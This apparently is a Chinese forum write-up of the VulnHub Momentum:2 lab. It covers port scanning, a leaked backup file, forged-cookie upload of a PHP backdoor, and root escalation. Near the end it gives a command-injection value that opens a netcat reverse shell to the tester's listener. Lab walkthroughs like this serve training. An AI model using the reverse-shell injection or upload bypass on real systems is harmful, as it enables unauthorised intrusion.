Momentum:2 vulnhub

zhaorong · 发表于 WEB前端技术 2022-6-27 15:22:40


	探测IP+端口扫描 netdiscover -r 192.168.81.0/24 nmap -A -p- 192.168.81.159 一个在22端口运行的SSH服务器一个运行在80端口的HTTP服务（Apache服务器）查看网站页面默认页面没有任何有用的信息探测子目录 gobuster dir -u http://192.168.81.159 -w /usr/share/wordlists/dirbuster/director y-list-2.3-medium.txt -t 40 -x html,txt,php,bak 查看可能存在可利用的网页 dashboard可以进行文件上传尝试长传文件，发现php会被过滤掉，但可以上传txt 查看源码，发现全端没有限制，应该在后端进行了过滤继续查看，访问/owls，发现上传的文件存储在了这里，因为会过滤，所以暂时不能利用上传功能了但是，似乎 ajax.php文件存在备份文件 curl http://192.168.81.159/ajax.php.bak 看起来管理员可以上传pdf、txt和PHP文件。因此，如果我们设置管理员的cookie，我们可以将shell上载到目标我们可能必须在请求中发送一个值为 val1d 的新POST参数 secure。 //老板让我在cookie的末尾再加一个大写字母-----》缺少一个字符编写一个后门文件，再一次上传，并用burp抓包 // Remember success upload returns 1 得到最后一个字母为R并上传成功了进行端口侦听，开启侦听后访问上传的文件得到如下界面遍历文件，发现在/home/athena$目录下有密码信息myvulnerableapp* Asterisk翻译是星号 user.txt中有一个flag 此时/root不能进入，我们尝试登录athena，看看有没有可以提升root权限的漏洞提权root ssh登录 ssh athena@192.168.81.159 sudo -l 可以看到用户可以以root身份执行python脚本，还有一个脚本查以下该命令的意思得知是执行了bash shell把命令写入log.txt, 因此，如果我可以输入一些命令，这将使我获得root访问权限。所以在输入seed，直接输入一个反弹的shell，kali端进行监听 ; nc 192.168.81.137 9004 -e /bin/sh; 第一个分号结束echo，然后写入反弹命令获得root权限，查看第二个flag成功

微信扫一扫 分享朋友圈

Momentum:2 vulnhub

微信扫一扫分享朋友圈